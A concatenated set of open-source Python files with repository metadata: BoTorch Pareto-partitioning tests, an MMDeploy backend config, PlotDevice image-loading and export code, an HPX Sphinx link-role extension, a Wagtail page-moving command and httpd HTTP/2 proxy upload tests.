compute_local_upper_bounds,
compute_non_dominated_hypercell_bounds_2d,
get_partition_bounds,
update_local_upper_bounds_incremental,
)
from botorch.utils.testing import BotorchTestCase
class TestUtils(BotorchTestCase):
def test_expand_ref_point(self):
ref_point = torch.tensor([1.0, 2.0], device=self.device)
for dtype in (torch.float, torch.double):
ref_point = ref_point.to(dtype=dtype)
# test non-batch
self.assertTrue(
torch.equal(
_expand_ref_point(ref_point, batch_shape=torch.Size([])),
ref_point,
)
)
self.assertTrue(
torch.equal(
_expand_ref_point(ref_point, batch_shape=torch.Size([3])),
ref_point.unsqueeze(0).expand(3, -1),
)
)
# test ref point with wrong shape batch_shape
with self.assertRaises(BotorchTensorDimensionError):
_expand_ref_point(ref_point.unsqueeze(0), batch_shape=torch.Size([]))
with self.assertRaises(BotorchTensorDimensionError):
_expand_ref_point(ref_point.unsqueeze(0).expand(3, -1), torch.Size([2]))
def test_pad_batch_pareto_frontier(self):
for dtype in (torch.float, torch.double):
Y1 = torch.tensor(
[
[1.0, 5.0],
[10.0, 3.0],
[4.0, 5.0],
[4.0, 5.0],
[5.0, 5.0],
[8.5, 3.5],
[8.5, 3.5],
[8.5, 3.0],
[9.0, 1.0],
[8.0, 1.0],
],
dtype=dtype,
device=self.device,
)
Y2 = torch.tensor(
[
[1.0, 9.0],
[10.0, 3.0],
[4.0, 5.0],
[4.0, 5.0],
[5.0, 5.0],
[8.5, 3.5],
[8.5, 3.5],
[8.5, 3.0],
[9.0, 5.0],
[9.0, 4.0],
],
dtype=dtype,
device=self.device,
)
Y = torch.stack([Y1, Y2], dim=0)
ref_point = torch.full((2, 2), 2.0, dtype=dtype, device=self.device)
padded_pareto = _pad_batch_pareto_frontier(
Y=Y, ref_point=ref_point, is_pareto=False
)
expected_nondom_Y1 = torch.tensor(
[[10.0, 3.0], [5.0, 5.0], [8.5, 3.5]],
dtype=dtype,
device=self.device,
)
expected_padded_nondom_Y2 = torch.tensor(
[
[10.0, 3.0],
[9.0, 5.0],
[9.0, 5.0],
],
dtype=dtype,
device=self.device,
)
expected_padded_pareto = torch.stack(
[expected_nondom_Y1, expected_padded_nondom_Y2], dim=0
)
self.assertTrue(torch.equal(padded_pareto, expected_padded_pareto))
# test feasibility mask
feas = (Y >= 9.0).any(dim=-1)
expected_nondom_Y1 = torch.tensor(
[[10.0, 3.0], [10.0, 3.0]],
dtype=dtype,
device=self.device,
)
expected_padded_nondom_Y2 = torch.tensor(
[[10.0, 3.0], [9.0, 5.0]],
dtype=dtype,
device=self.device,
)
expected_padded_pareto = torch.stack(
[expected_nondom_Y1, expected_padded_nondom_Y2], dim=0
)
padded_pareto = _pad_batch_pareto_frontier(
Y=Y, ref_point=ref_point, feasibility_mask=feas, is_pareto=False
)
self.assertTrue(torch.equal(padded_pareto, expected_padded_pareto))
# test is_pareto=True
# one row of Y2 should be dropped because it is not better than the
# reference point
Y1 = torch.tensor(
[[10.0, 3.0], [5.0, 5.0], [8.5, 3.5]],
dtype=dtype,
device=self.device,
)
Y2 = torch.tensor(
[
[1.0, 9.0],
[10.0, 3.0],
[9.0, 5.0],
],
dtype=dtype,
device=self.device,
)
Y = torch.stack([Y1, Y2], dim=0)
expected_padded_pareto = torch.stack(
[
Y1,
torch.cat([Y2[1:], Y2[-1:]], dim=0),
],
dim=0,
)
padded_pareto = _pad_batch_pareto_frontier(
Y=Y, ref_point=ref_point, is_pareto=True
)
self.assertTrue(torch.equal(padded_pareto, expected_padded_pareto))
# test multiple batch dims
with self.assertRaises(UnsupportedError):
_pad_batch_pareto_frontier(
Y=Y.unsqueeze(0), ref_point=ref_point, is_pareto=False
)
def test_compute_hypercell_bounds_2d(self):
ref_point_raw = torch.zeros(2, device=self.device)
arange = torch.arange(3, 9, device=self.device)
pareto_Y_raw = torch.stack([arange, 11 - arange], dim=-1)
inf = float("inf")
for method in (
compute_non_dominated_hypercell_bounds_2d,
compute_dominated_hypercell_bounds_2d,
):
if method == compute_non_dominated_hypercell_bounds_2d:
expected_cell_bounds_raw = torch.tensor(
[
[
[0.0, 8.0],
[3.0, 7.0],
[4.0, 6.0],
[5.0, 5.0],
[6.0, 4.0],
[7.0, 3.0],
[8.0, 0.0],
],
[
[3.0, inf],
[4.0, inf],
[5.0, inf],
[6.0, inf],
[7.0, inf],
[8.0, inf],
[inf, inf],
],
],
device=self.device,
)
else:
expected_cell_bounds_raw = torch.tensor(
[
[
[0.0, 0.0],
[3.0, 0.0],
[4.0, 0.0],
[5.0, 0.0],
[6.0, 0.0],
[7.0, 0.0],
],
[
[3.0, 8.0],
[4.0, 7.0],
[5.0, 6.0],
[6.0, 5.0],
[7.0, 4.0],
[8.0, 3.0],
],
],
device=self.device,
)
for dtype in (torch.float, torch.double):
pareto_Y = pareto_Y_raw.to(dtype=dtype)
ref_point = ref_point_raw.to(dtype=dtype)
expected_cell_bounds = expected_cell_bounds_raw.to(dtype=dtype)
# test non-batch
cell_bounds = method(
pareto_Y_sorted=pareto_Y,
ref_point=ref_point,
)
self.assertTrue(torch.equal(cell_bounds, expected_cell_bounds))
# test batch
pareto_Y_batch = torch.stack(
[pareto_Y, pareto_Y + pareto_Y.max(dim=-2).values], dim=0
)
# filter out points that are not better than ref_point
ref_point = pareto_Y.max(dim=-2).values
pareto_Y_batch = _pad_batch_pareto_frontier(
Y=pareto_Y_batch, ref_point=ref_point, is_pareto=True
)
# sort pareto_Y_batch
pareto_Y_batch = pareto_Y_batch.gather(
index=torch.argsort(pareto_Y_batch[..., :1], dim=-2).expand(
pareto_Y_batch.shape
),
dim=-2,
)
cell_bounds = method(
ref_point=ref_point,
pareto_Y_sorted=pareto_Y_batch,
)
# check hypervolume
max_vals = (pareto_Y + pareto_Y).max(dim=-2).values
if method == compute_non_dominated_hypercell_bounds_2d:
clamped_cell_bounds = torch.min(cell_bounds, max_vals)
total_hv = (max_vals - ref_point).prod()
nondom_hv = (
(clamped_cell_bounds[1] - clamped_cell_bounds[0])
.prod(dim=-1)
.sum(dim=-1)
)
hv = total_hv - nondom_hv
else:
hv = (cell_bounds[1] - cell_bounds[0]).prod(dim=-1).sum(dim=-1)
self.assertEqual(hv[0].item(), 0.0)
self.assertEqual(hv[1].item(), 49.0)
class TestFastPartitioningUtils(BotorchTestCase):
"""
    Test on the problem (with the simplifying assumption of general position)
from Table 1 in:
https://www.sciencedirect.com/science/article/pii/S0305054816301538
"""
def setUp(self):
super().setUp()
self.ref_point = -torch.tensor([10.0, 10.0, 10.0], device=self.device)
self.U = -self.ref_point.clone().view(1, -1)
self.Z = torch.empty(1, 3, 3, device=self.device)
ideal_value = 0.0
for j in range(self.U.shape[-1]):
self.Z[0, j] = torch.full(
(1, self.U.shape[-1]),
ideal_value,
dtype=self.Z.dtype,
device=self.device,
)
self.Z[0, j, j] = self.U[0][j]
self.pareto_Y = -torch.tensor(
[
[3.0, 5.0, 7.0],
[6.0, 2.0, 4.0],
[4.0, 7.0, 3.0],
],
device=self.device,
)
self.expected_U_after_update = torch.tensor(
[
[3.0, 10.0, 10.0],
[6.0, 5.0, 10.0],
[10.0, 2.0, 10.0],
[4.0, 10.0, 7.0],
[6.0, 7.0, 7.0],
[10.0, 7.0, 4.0],
[10.0, 10.0, 3.0],
],
device=self.device,
)
self.expected_Z_after_update = torch.tensor(
[
[[3.0, 5.0, 7.0], [0.0, 10.0, 0.0], [0.0, 0.0, 10.0]],
[[6.0, 2.0, 4.0], [3.0, 5.0, 7.0], [0.0, 0.0, 10.0]],
[[10.0, 0.0, 0.0], [6.0, 2.0, 4.0], [0.0, 0.0, 10.0]],
[[4.0, 7.0, 3.0], [0.0, 10.0, 0.0], [3.0, 5.0, 7.0]],
[[6.0, 2.0, 4.0], [4.0, 7.0, 3.0], [3.0, 5.0, 7.0]],
[[10.0, 0.0, 0.0], [4.0, 7.0, 3.0], [6.0, 2.0, 4.0]],
[[10.0, 0.0, 0.0], [0.0, 10.0, 0.0], [4.0, 7.0, 3.0]],
],
device=self.device,
)
def test_local_upper_bounds_utils(self):
for dtype in (torch.float, torch.double):
U = self.U.to(dtype=dtype)
Z = self.Z.to(dtype=dtype)
pareto_Y = self.pareto_Y.to(dtype=dtype)
expected_U = self.expected_U_after_update.to(dtype=dtype)
expected_Z = self.expected_Z_after_update.to(dtype=dtype)
# test z dominates U
U_new, Z_new = compute_local_upper_bounds(U=U, Z=Z, z=-self.ref_point + 1)
self.assertTrue(torch.equal(U_new, U))
self.assertTrue(torch.equal(Z_new, Z))
# test compute_local_upper_bounds
for i in range(pareto_Y.shape[0]):
U, Z = compute_local_upper_bounds(U=U, Z=Z, z=-pareto_Y[i])
self.assertTrue(torch.equal(U, expected_U))
self.assertTrue(torch.equal(Z, expected_Z))
# test update_local_upper_bounds_incremental
# test that calling update_local_upper_bounds_incremental once with
# the entire Pareto set yields the same result
U2, Z2 = update_local_upper_bounds_incremental(
new_pareto_Y=-pareto_Y,
U=self.U.to(dtype=dtype),
Z=self.Z.to(dtype=dtype),
)
self.assertTrue(torch.equal(U2, expected_U))
self.assertTrue(torch.equal(Z2, expected_Z))
def test_get_partition_bounds(self):
expected_bounds_raw = torch.tensor(
[
[[3.0, 5.0, 7.0], [6.0, 2.0, 7.0], [4.0, 7.0, 3.0], [6.0, 2.0, 4.0]],
[
[10.0, 10.0, 10.0],
[10.0, 5.0, 10.0],
[10.0, 10.0, 7.0],
[10.0, 7.0, 7.0],
],
],
device=self.device,
)
for dtype in (torch.float, torch.double):
final_U = self.expected_U_after_update.to(dtype=dtype)
final_Z = self.expected_Z_after_update.to(dtype=dtype)
bounds = get_partition_bounds(
Z=final_Z, U=final_U, ref_point=-self.ref_point
)
expected_bounds = expected_bounds_raw.to(dtype=dtype)
self.assertTrue(torch.equal(bounds, expected_bounds))
|
03f9614f114eb712db6f808cc155f189a6a6507f
|
0e083f405af00029c9ec31849f0f7f81c56844b5
|
/configs/mmseg/segmentation_vacc-fp16_static_512x512.py
|
04de98468eca47da918a0fb72859d58798e372f3
|
[
"Apache-2.0"
] |
permissive
|
open-mmlab/mmdeploy
|
39b9e7b611caab2c76a6142fcb99f0bf1d92ad24
|
5479c8774f5b88d7ed9d399d4e305cb42cc2e73a
|
refs/heads/main
| 2023-09-01T21:29:25.315371
| 2023-08-31T09:59:29
| 2023-08-31T09:59:29
| 441,467,833
| 2,164
| 605
|
Apache-2.0
| 2023-09-14T10:39:04
| 2021-12-24T13:04:44
|
Python
|
UTF-8
|
Python
| false
| false
| 1,187
|
py
|
segmentation_vacc-fp16_static_512x512.py
|
_base_ = ['./segmentation_static.py', '../_base_/backends/vacc.py']
onnx_config = dict(input_shape=[512, 512])
backend_config = dict(
common_config=dict(
vdsp_params_info=dict(
vdsp_op_type=301,
iimage_format=5000,
iimage_width=512,
iimage_height=512,
oimage_width=512,
oimage_height=512,
iimage_width_pitch=512,
iimage_height_pitch=512,
resize_type=1,
color_cvt_code=2,
color_space=0,
meanr=22459,
meang=22340,
meanb=22136,
stdr=21325,
stdg=21284,
stdb=21292,
norma_type=3)),
model_inputs=[dict(shape=dict(input=[1, 3, 512, 512]))])
codebase_config = dict(model_type='vacc_seg')
partition_config = dict(
type='vacc_seg',
apply_marks=True,
partition_cfg=[
dict(
save_file='model.onnx',
start=['segmentor_forward:output'],
# 'decode_head' will skip `ArgMax`
# 'seg_maps' will skip `Resize` and `ArgMax`
end=['decode_head:input'],
output_names=['feat'])
])
|
490f544f12dae432c34568098ed41233b2ffb337
|
eb9f655206c43c12b497c667ba56a0d358b6bc3a
|
/python/testData/console/indent6.py
|
6213c78f7a9849b390e12f1531834890edaf79ae
|
[
"Apache-2.0"
] |
permissive
|
JetBrains/intellij-community
|
2ed226e200ecc17c037dcddd4a006de56cd43941
|
05dbd4575d01a213f3f4d69aa4968473f2536142
|
refs/heads/master
| 2023-09-03T17:06:37.560889
| 2023-09-03T11:51:00
| 2023-09-03T12:12:27
| 2,489,216
| 16,288
| 6,635
|
Apache-2.0
| 2023-09-12T07:41:58
| 2011-09-30T13:33:05
| null |
UTF-8
|
Python
| false
| false
| 314
|
py
|
indent6.py
|
class Foo:
def x(self):
b = "x".format("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa")
if b:
pass
|
92937eb9d7fbcfd2dee291f604ff49459138f709
|
0f443b5060644606abb090935bb8fe234378a659
|
/plotdevice/gfx/image.py
|
9e3915c52564474355a392c9aeca5ce9fe3c6bed
|
[
"BSD-3-Clause",
"MIT"
] |
permissive
|
plotdevice/plotdevice
|
6920ae4f11b65c3bd5a7c1d9d21cd0cd3444fd42
|
63992250982590a5290c0135fb9845581c5ccd89
|
refs/heads/main
| 2023-08-28T11:55:18.331183
| 2022-07-15T19:52:20
| 2022-07-15T19:52:20
| 14,907,048
| 116
| 17
| null | 2022-07-10T21:16:19
| 2013-12-03T21:58:16
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 15,615
|
py
|
image.py
|
# encoding: utf-8
import os
import re
import json
import warnings
import math
from contextlib import contextmanager
from urllib.parse import urlparse
from ..lib.cocoa import *
from plotdevice import DeviceError
from ..util import _copy_attrs, autorelease
from ..util.readers import HTTP, last_modified
from ..lib.io import MovieExportSession, ImageExportSession
from .geometry import Region, Size, Point, Transform, CENTER
from .atoms import TransformMixin, EffectsMixin, FrameMixin, Grob
from .colors import CMYK
from . import _ns_context
_ctx = None
__all__ = ("Image", 'ImageWriter')
### The bitmap/vector image-container (a.k.a. NSImage proxy) ###
class Image(EffectsMixin, TransformMixin, FrameMixin, Grob):
stateAttrs = ('_nsImage',)
opts = ('data',)
def __init__(self, *args, **kwargs):
"""
Positional parameters:
- src: the path to an image file, an existing Image object, or the `canvas` global
- x & y: position of top-left corner
- width & height: limit either or both dimensions to a maximum size
If a width and height are both given, the narrower dimension is used
If both are omitted default to full-size
Optional keyword parameters:
- data: a stream of bytes of image data. If the data begins with the
characters "base64," the remainder of the stream will be
decoded before loading
- alpha: the image opacity (0-1.0)
- blend: a blend mode name
Example usage:
x,y, w,h = 10,10, 200,200
Image("foo.png", x, y, w, h)
Image(<Image object>, x, y, height=h)
Image(x, y, src='path-or-url')
Image(x, y, data='<raw bytes from an image file>')
Image(x, y, data='base64,<b64-encoded bytes>')
Image(canvas, x, y)
"""
# let the mixins handle transforms & effects
super(Image, self).__init__(**kwargs)
# look for a path or Image as the first arg, or a `data` kwarg (plus `image` for compat)
args = list(args)
data = kwargs.get('data', None)
src = kwargs.get('src', kwargs.get('image', None))
if args and not (src or data):
src = args.pop(0) # use first arg if image wasn't in kwargs
elif args and args[0] is None:
args.pop(0) # make image(None, 10,20, image=...) work properly for compat
        # get an NSImage reference (one way or another)
if data:
self._nsImage = self._lazyload(data=data)
elif src:
if isinstance(src, NSImage):
self._nsImage = src.copy()
self._nsImage.setFlipped_(True)
elif hasattr(src, '_nsImage'):
self._nsImage = src._nsImage
elif isinstance(src, str):
self._nsImage = self._lazyload(path=src)
else:
invalid = "Not a valid image source: %r" % type(src)
raise DeviceError(invalid)
# set the bounds (in phases)
if isinstance(src, Image):
# if working from an existing Image, inherit its bounds as the default
for attr in ['x','y','width','height']:
setattr(self, attr, getattr(src, attr))
if args:
# override defaults with positional bounds args (if any)
self._frame._parse(args)
if kwargs:
# finally, let keyword args override the inherited & positional bounds
for k,v in kwargs.items():
if k in FrameMixin.opts:
setattr(self, k, v)
def _lazyload(self, path=None, data=None):
# loads either a `path` or `data` kwarg and returns an NSImage
# `path` should be the path of a valid image file
# `data` should be the bytestring contents of an image file, or base64-encoded
# with the characters "base64," prepended to it
NSDataBase64DecodingIgnoreUnknownCharacters = 1
_cache = _ctx._imagecache
if data is not None:
# convert the str into an NSData (possibly decoding along the way)
if isinstance(data, str) and data.startswith('base64,'):
data = NSData.alloc().initWithBase64EncodedString_options_(data[7:], NSDataBase64DecodingIgnoreUnknownCharacters)
elif not isinstance(data, NSData):
data = NSData.dataWithBytes_length_(data, len(data))
key, mtime, err_info = data.hash(), None, type(data)
# return a cached image if possible...
if key in _cache:
return _cache[key][0]
# ...or load from the data
if b'<svg' in data.getBytes_length_(None, 128):
image = NSImage.svgFromData_(data)
else:
image = NSImage.alloc().initWithData_(data)
elif path is not None:
if re.match(r'https?:', path):
# load from url
key = err_info = path
resp = HTTP.get(path)
mtime = last_modified(resp)
# return a cached image if possible...
if path in _cache and _cache[path][1] >= mtime:
return _cache[path][0]
# ...or load from the data
data = NSData.dataWithBytes_length_(resp.content, len(resp.content))
if 'svg' in resp.headers['Content-Type'] or urlparse(path).path.lower().endswith('.svg'):
image = NSImage.svgFromData_(data)
else:
image = NSImage.alloc().initWithData_(data)
else:
# load from file path
try:
path = NSString.stringByExpandingTildeInPath(path)
mtime = os.path.getmtime(path)
# return a cached image if possible...
if path in _cache and _cache[path][1] >= mtime:
return _cache[path][0]
except:
notfound = 'Image "%s" not found.' % path
raise DeviceError(notfound)
key = err_info = path
# ...or load from the file
if path.lower().endswith('.svg'):
image = NSImage.svgFromURL_(NSURL.fileURLWithPath_(path))
else:
image = NSImage.alloc().initWithContentsOfFile_(path)
# if we wound up with a valid image, configure and cache the NSImage
# before returning it
if image is None:
invalid = "Doesn't seem to contain image data: %r" % err_info
raise DeviceError(invalid)
image.setFlipped_(True)
image.setCacheMode_(NSImageCacheNever)
_cache[key] = (image, mtime)
return _cache[key][0]
@property
def image(self):
warnings.warn("The 'image' attribute is deprecated. Please use _nsImage instead.", DeprecationWarning, stacklevel=2)
return self._nsImage
@property
def _nsBitmap(self):
for bitmap in self._nsImage.representations():
# if we already have a bitmap representation, use that...
if isinstance(bitmap, NSBitmapImageRep):
break
else:
# ...otherwise convert the vector image to a bitmap
# (note that this should use _screen_transform somehow but currently doesn't)
tiffdata = self._nsImage.TIFFRepresentation()
image = NSImage.alloc().initWithData_(tiffdata)
bitmap = image.representations()[0]
return bitmap
@property
def _ciImage(self):
# core-image needs to be told to compensate for our flipped coords
flip = NSAffineTransform.transform()
flip.translateXBy_yBy_(0, self.size.height)
flip.scaleXBy_yBy_(1,-1)
ciImage = CIImage.alloc().initWithBitmapImageRep_(self._nsBitmap)
transform = CIFilter.filterWithName_("CIAffineTransform")
transform.setValue_forKey_(ciImage, "inputImage")
transform.setValue_forKey_(flip, "inputTransform")
return transform.valueForKey_("outputImage")
@property
def bounds(self):
w, h = self.size.w*self._scalefactor, self.size.h*self._scalefactor
return Region(self.x, self.y, w, h)
@property
def size(self):
"""Returns the size of the source image in canvas units. Note that any magnification
via the width and height parameters is not factored in. For the displayed size, see
the .bounds property."""
return self._from_px(self._nsImage.size())
@property
def _scalefactor(self):
"""Fits the image into any specified width & height constraints. If neither was
included in the call to image(), defaults to the image file's full size."""
src = self.size
if not any([self.width, self.height]):
factor = 1.0
elif all([self.width, self.height]):
factor = min(self.width/src.width, self.height/src.height)
else:
dim, src_dim = max((self.width or 0, src.width), (self.height or 0, src.height))
factor = dim/src_dim
return factor
@property
def _screen_transform(self):
"""Returns the Transform object that will be used to draw the image.
The transform incorporates the global context state but also accounts for
centering and max width/height values set in the constructor."""
# accumulate transformations in a fresh matrix
xf = Transform()
# set scale factor so entire image fits in the given rect or dimension
factor = self._scalefactor
# calculate the pixel dimensions (accounting for the canvas's units)
dx, dy = self._to_px(Point(self.x, self.y))
w, h = self._to_px(self.size)
# calculate the translation offset for centering (if any)
nudge = Transform()
if self._transformmode == CENTER:
nudge.translate(w*factor/2, h*factor/2)
xf.translate(dx, dy) # set the position before applying transforms
xf.prepend(nudge) # nudge the image to its center (or not)
xf.prepend(self.transform) # add context's CTM.
xf.prepend(nudge.inverse) # Move back to the real origin.
xf.scale(factor) # scale to fit size constraints (if any)
return xf
def _draw(self):
"""Draw an image on the given coordinates."""
with _ns_context() as ns_ctx:
self._screen_transform.concat() # move the image into place via transforms
with self.effects.applied(): # apply any blend/alpha/shadow effects
ns_ctx.setImageInterpolation_(NSImageInterpolationHigh)
bounds = ((0,0), self._nsImage.size()) # draw the image at (0,0)
self._nsImage.drawAtPoint_fromRect_operation_fraction_((0,0), bounds, NSCompositeSourceOver, self.alpha)
# NB: the nodebox source warns about quartz bugs triggered by drawing
# EPSs to other origin points. no clue whether this still applies...
### context manager for calls to `with export(...)` ###
import time
re_padded = re.compile(r'{(\d+)}')
class ImageWriter(object):
def __init__(self, fname, format, **opts):
self.mode = CMYK if opts['cmyk'] else _ctx._outputmode
self.fname = os.path.expanduser(fname)
self.format = format
self.opts = opts
self.anim = 'fps' in opts
self.session = None
def __enter__(self):
self._pool = NSAutoreleasePool.alloc().init()
_ctx._saveContext()
_ctx._outputmode = self.mode
return self
def __exit__(self, type, value, tb):
if not self.session:
#
# with export('out.png'):
# ... # draw a single frame
#
self.opts['single'] = True
self.add()
_ctx._restoreContext()
self.finish()
del self._pool
def __del__(self):
if not self.session:
#
# ... # draw a single frame
# export('out.png')
#
m = re_padded.search(self.fname)
fn = re_padded.sub('0'*int(m.group(1)), self.fname, count=1) if m else self.fname
_ctx._outputmode = self.mode
_ctx.canvas.save(fn, self.format, self.opts['zoom'], self.mode==CMYK)
@property
def page(self):
"""Clears the canvas, runs the code in the `with` block, then adds the canvas as a new pdf page.
For example, to create a pdf with two pages, you could write:
with export("multipage.pdf") as pdf:
clear(all)
... # draw first page
pdf.add()
clear(all)
... # draw the next page
pdf.add()
With the `page` context manager it simplifies to:
with export("multipage.pdf") as pdf:
with pdf.page:
... # draw first page
with pdf.page:
... # draw the next page
"""
if self.format != 'pdf':
badform = 'The `page` property can only be used in PDF exports (not %r)'%self.format
raise DeviceError(badform)
self.opts['single'] = True
return self.frame
@property
@contextmanager
def frame(self):
"""Clears the canvas, runs the code in the `with` block, then adds the canvas to the
animation or image sequence.
For example, to create a quicktime movie and write a single frame to it you could write:
with export("anim.mov") as movie:
canvas.clear()
... # draw the frame
movie.add()
With the `frame` context manager, this simplifies to:
with export("anim.mov") as movie:
with movie.frame:
... # draw the frame
You can also use the `frame` property when writing to a series of sequentially-named
files. For example, to generate 'output-0001.png' through 'output-0100.png':
with export('output.png') as seq:
for i in range(100):
with seq.frame:
... # draw the next image in the sequence
Or if you'd like to control the numbering, specify a padding-width and location in
the file name by including a '{n}' in the call to export(). The following will
generate files named '01-output.png' through '100-output.png':
with export('{2}-output.png') as seq:
for i in range(100):
with seq.frame:
... # draw the next image in the sequence
"""
with autorelease():
_ctx._saveContext()
yield
self.add()
_ctx._restoreContext()
def add(self):
"""Add a new frame or page with the current contents of the canvas."""
if not self.session:
if self.anim:
self.session = MovieExportSession(self.fname, self.format, **self.opts)
else:
self.session = ImageExportSession(self.fname, self.format, **self.opts)
self.session.add(_ctx.canvas)
def finish(self):
"""Blocks until disk I/O is complete"""
self.session.done()
while True:
if self.session.writer.doneWriting():
break
time.sleep(0.1)
|
eabae0aea330a3be51ba8fceeac84d0d57531ac6
|
9939aab9b0bd1dcf8f37d4ec315ded474076b322
|
/docs/sphinx/extensions/sphinx-hpx.py
|
319766809ea62b18c2c2e89fdd04f4d5aacfb8f4
|
[
"BSL-1.0",
"LicenseRef-scancode-free-unknown"
] |
permissive
|
STEllAR-GROUP/hpx
|
1068d7c3c4a941c74d9c548d217fb82702053379
|
c435525b4631c5028a9cb085fc0d27012adaab8c
|
refs/heads/master
| 2023-08-30T00:46:26.910504
| 2023-08-29T14:59:39
| 2023-08-29T14:59:39
| 4,455,628
| 2,244
| 500
|
BSL-1.0
| 2023-09-14T13:54:12
| 2012-05-26T15:02:39
|
C++
|
UTF-8
|
Python
| false
| false
| 2,806
|
py
|
sphinx-hpx.py
|
# Copyright (c) 2018 Mikael Simberg
# Copyright (c) 2022 Hartmut Kaiser
#
# SPDX-License-Identifier: BSL-1.0
# Distributed under the Boost Software License, Version 1.0. (See accompanying
# file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
from docutils import nodes
def setup(app):
app.add_role('hpx-issue', autolink('https://github.com/STEllAR-GROUP/hpx/issues/%s', "Issue #"))
app.add_role('hpx-header', autolink_hpx_file('http://github.com/STEllAR-GROUP/hpx/blob/%s/%s/%s'))
app.add_role('hpx-pr', autolink('https://github.com/STEllAR-GROUP/hpx/pull/%s', "PR #"))
app.add_role('cppreference-header', autolink('http://en.cppreference.com/w/cpp/header/%s'))
app.add_role('cppreference-algorithm', autolink('http://en.cppreference.com/w/cpp/algorithm/%s'))
app.add_role('cppreference-memory', autolink('http://en.cppreference.com/w/cpp/memory/%s'))
app.add_role('cppreference-container', autolink('http://en.cppreference.com/w/cpp/container/%s'))
app.add_role('cppreference-generic', autolink_generic('http://en.cppreference.com/w/cpp/%s/%s'))
def autolink(pattern, prefix=''):
def role(name, rawtext, text, lineno, inliner, options={}, content=[]):
url = pattern % (text,)
node = nodes.reference(rawtext, prefix + text, refuri=url, **options)
return [node], []
return role
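# Usage sketch (illustrative): a role created by autolink() is used in rst as
# :hpx-issue:`1234` or :hpx-pr:`5678` (issue/PR numbers are assumptions) and
# renders as an "Issue #1234" / "PR #5678" link to the matching GitHub page.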
# The text in the rst file should be:
# :hpx-header:`base_path,file_name`
def autolink_hpx_file(pattern):
def role(name, rawtext, text, lineno, inliner, options={}, content=[]):
text_parts = [p.strip() for p in text.split(',')]
commit = inliner.document.settings.env.app.config.html_context['fullcommit']
if len(text_parts) >= 2:
url = pattern % (commit, text_parts[0], text_parts[1])
else:
url = pattern % (commit, text_parts[0], text_parts[0])
node = nodes.reference(rawtext, text_parts[1], refuri=url, **options)
return [node], []
return role
# The text in the rst file should be:
# :cppreference-generic:`base_path,typename[,shown]`, for instance `thread,barrier`
def autolink_generic(pattern):
def role(name, rawtext, text, lineno, inliner, options={}, content=[]):
text_parts = [p.strip() for p in text.split(',')]
shown_text = None
if len(text_parts) >= 3:
shown_text = text_parts[2]
url = pattern % (text_parts[0], text_parts[1])
elif len(text_parts) == 2:
shown_text = text_parts[1]
url = pattern % (text_parts[0], text_parts[1])
else:
shown_text = text_parts[0]
url = pattern % (text_parts[0], text_parts[0])
node = nodes.reference(rawtext, "std::" + shown_text, refuri=url, **options)
return [node], []
return role
|
ce17a042134a40896b6eb89dd78572ede7069674
|
d1f15554df2d5c0f74ddbcba6e870359841f682b
|
/wagtail/management/commands/move_pages.py
|
0502f67f8dd6639c57e84f6821fbe6d1fccd6619
|
[
"BSD-3-Clause",
"LicenseRef-scancode-proprietary-license"
] |
permissive
|
wagtail/wagtail
|
bd405f89b86e0c625fef0685fd6bfba41cf5cbfc
|
06a7bc6124bf62675c09fbe0a4ed9bbac183e025
|
refs/heads/main
| 2023-09-04T06:22:51.601208
| 2023-09-01T15:22:00
| 2023-09-01T15:22:00
| 16,479,108
| 12,974
| 3,580
|
BSD-3-Clause
| 2023-09-14T10:45:04
| 2014-02-03T12:41:59
|
Python
|
UTF-8
|
Python
| false
| false
| 852
|
py
|
move_pages.py
|
from django.core.management.base import BaseCommand
from wagtail.models import Page
class Command(BaseCommand):
def add_arguments(self, parser):
# Positional arguments
parser.add_argument("from_id", type=int)
parser.add_argument("to_id", type=int)
def handle(self, *args, **options):
# Get pages
from_page = Page.objects.get(pk=options["from_id"])
to_page = Page.objects.get(pk=options["to_id"])
pages = from_page.get_children()
# Move the pages
self.stdout.write(
"Moving "
+ str(len(pages))
+ ' pages from "'
+ from_page.title
+ '" to "'
+ to_page.title
+ '"'
)
for page in pages:
page.move(to_page, pos="last-child")
self.stdout.write("Done")
|
fd40d91faaa35f9bac2dd4a4d152d5a51821e065
|
e8c76797b194bce6702adf9721a96c2b440efd5c
|
/test/modules/http2/test_601_h2proxy_twisted.py
|
60f5f7df5bfdf3081968c544f07aa530017fbfb0
|
[
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-public-domain",
"Apache-2.0",
"LicenseRef-scancode-zeusbench",
"BSD-3-Clause",
"RSA-MD",
"LicenseRef-scancode-rsa-1990",
"Beerware",
"LicenseRef-scancode-other-permissive",
"Spencer-94",
"metamail",
"LicenseRef-scancode-rsa-md4",
"HPND-sell-variant"
] |
permissive
|
apache/httpd
|
86bfac3d6e2e9b48f5bfca5be7ec616fa9b14e9a
|
b9e029c8036fd036281ac266010db91aed6079b2
|
refs/heads/trunk
| 2023-09-04T07:18:59.681233
| 2023-08-30T12:56:11
| 2023-08-30T12:56:11
| 205,423
| 3,159
| 1,329
|
Apache-2.0
| 2023-09-11T13:50:41
| 2009-05-20T02:02:59
|
C
|
UTF-8
|
Python
| false
| false
| 4,028
|
py
|
test_601_h2proxy_twisted.py
|
import json
import logging
import os
import pytest
from .env import H2Conf, H2TestEnv
log = logging.getLogger(__name__)
@pytest.mark.skipif(condition=H2TestEnv.is_unsupported, reason="mod_http2 not supported here")
class TestH2ProxyTwisted:
@pytest.fixture(autouse=True, scope='class')
def _class_scope(self, env):
H2Conf(env).add_vhost_cgi(proxy_self=True, h2proxy_self=True).install()
assert env.apache_restart() == 0
@pytest.mark.parametrize("name", [
"data-1k", "data-10k", "data-100k", "data-1m",
])
def test_h2_601_01_echo_uploads(self, env, name):
fpath = os.path.join(env.gen_dir, name)
url = env.mkurl("https", "cgi", "/h2proxy/h2test/echo")
r = env.curl_upload(url, fpath, options=[])
assert r.exit_code == 0
assert 200 <= r.response["status"] < 300
# we POST a form, so echoed input is larger than the file itself
assert len(r.response["body"]) > os.path.getsize(fpath)
@pytest.mark.parametrize("name", [
"data-1k", "data-10k", "data-100k", "data-1m",
])
def test_h2_601_02_echo_delayed(self, env, name):
fpath = os.path.join(env.gen_dir, name)
